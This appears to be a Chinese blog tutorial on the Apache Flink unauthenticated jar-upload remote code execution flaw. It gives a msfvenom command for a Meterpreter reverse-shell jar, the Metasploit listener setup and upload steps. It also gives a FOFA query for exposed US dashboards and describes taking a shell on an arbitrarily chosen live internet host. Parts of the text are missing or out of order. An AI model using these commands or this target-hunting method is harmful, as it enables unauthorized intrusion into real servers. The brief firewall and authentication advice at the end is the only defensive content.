这篇文章给大家介绍apache flink任意jar包上传导致远程代码执行的示例分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
漏洞描述:
2019年11月11号,安全工程师Henry Chen披露了一个Apache Flink未授权上传jar包导致远程代码执行的漏洞。由于Apache Flink Dashboard 默认无需认证即可访问,通过上传恶意jar包并触发恶意代码执行,从而获取shell。
影响范围
Export(导出)
b.然后选择java–>Runnable JAR file
c.然后选择对应的java项目和导出路径以及导出文件名
图片
这样就生成了一个反弹shell的jar包
msf生成jar马:
(1) 利用msfvenom来生成一个jar马:
msfvenom-pjava/meterpreter/reverse_tcpLHOST=172.26.1.156LPORT=9999W>text.jar
(2) 打开msf的监听模块,并监听9999端口(要与我们jar马设置的端口一致)
useexploit/multi/handlersetpayloadjava/meterpreter/reverse_tcpsetLHOST172.26.1.156setLPORT9999exploit
(3) 上传我们生成的jar马并提交后(这部分操作参考下面的复现),可以看到我们成功接收到shell:
本地复现:
(1) 访问目标:
(2) 点击Submit New job,打开上传jar包的页面:
(3) 点击Add New选择我们制作好的jar包:
(4) 我们的机器上监听好端口(我们制作的jar包是直接反弹shell的)
(5) 点击我们刚刚上传的jar包:
(6) 然后点击Submit即可,可以看到我们已经成功接收到了shell:
互联网站点:
fofa关键词:
\”apache-flink-dashboard\” && country=\”US\”
(1) 随便找一个目标:
(2) 点击Submit new Job,可以看到其可以允许我们上传jar包
(3) 利用flink上传jar包的功能将我们的jar包上传:
(4) 上传后,我们在我们的vps上监听好端口
(5) 然后回到浏览器,选中我们刚刚上传的jar包,然后点击Submitting提交,可以看到我们的vps已经成功接收到了shell
漏洞修复:
建议设置防火墙策略,仅允许白名单ip访问 apache flink服务,并在Web代理(如apache httpd)中增加对该服务的digest认证。
时刻关注官网,等待新版本或补丁更新
关于apache flink任意jar包上传导致远程代码执行的示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
还没有评论,来说两句吧...